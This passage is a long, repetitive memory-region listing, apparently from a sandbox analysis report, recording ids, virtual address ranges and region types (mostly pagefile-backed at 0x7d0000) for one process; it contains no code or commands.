	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1479
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1480
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1481
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1482
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1483
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1484
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1485
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1486
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1487
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1488
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1489
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1490
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1491
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1492
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1493
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1494
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1495
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1496
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1497
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1498
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1499
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1500
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1501
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1502
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1503
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1504
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1505
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1506
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1507
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1508
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1509
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1510
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1511
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1512
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1513
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1514
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1515
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1516
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1517
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1518
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1519
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1520
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1521
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1522
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1523
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1524
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1525
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1526
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1527
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1528
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1529
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1530
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1531
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1532
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1533
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1534
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1535
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1536
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1537
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1538
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1539
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1540
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1541
	        start_va = 0x7d0000
	          end_va = 0x7dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1542
	        start_va = 0x2180000
	          end_va = 0x2197fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002180000"
	        filename = ""

Region:
	              id = 1543
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1544
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1545
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1546
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1547
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1548
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1549
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1550
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1551
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1552
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1553
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1554
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1555
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1556
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1557
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1558
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1559
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1560
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1561
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1562
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1563
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1564
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1565
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1566
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1567
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1568
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1569
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1570
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1571
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1572
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1573
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1574
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1575
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1576
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1577
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1578
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1579
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1580
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1581
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1582
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1583
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1584
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1585
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1586
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1587
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1588
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1589
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1590
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1591
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1592
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1593
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1594
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1595
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1596
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1597
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1598
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1599
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1600
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1601
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1602
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1603
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1605
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1606
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1607
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1608
	        start_va = 0x7d0000
	          end_va = 0x7dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1609
	        start_va = 0x2180000
	          end_va = 0x2197fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000002180000"
	        filename = ""

Region:
	              id = 1610
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1611
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1612
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1613
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1614
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1615
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1616
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1617
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1618
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1619
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1620
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1621
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1622
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1623
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1624
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1625
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1626
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1627
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1628
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1629
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1630
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1631
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1632
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1633
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1634
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
	        filename = ""

Region:
	              id = 1635
	        start_va = 0x7d0000
	          end_va = 0x7d8fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000007d0000"
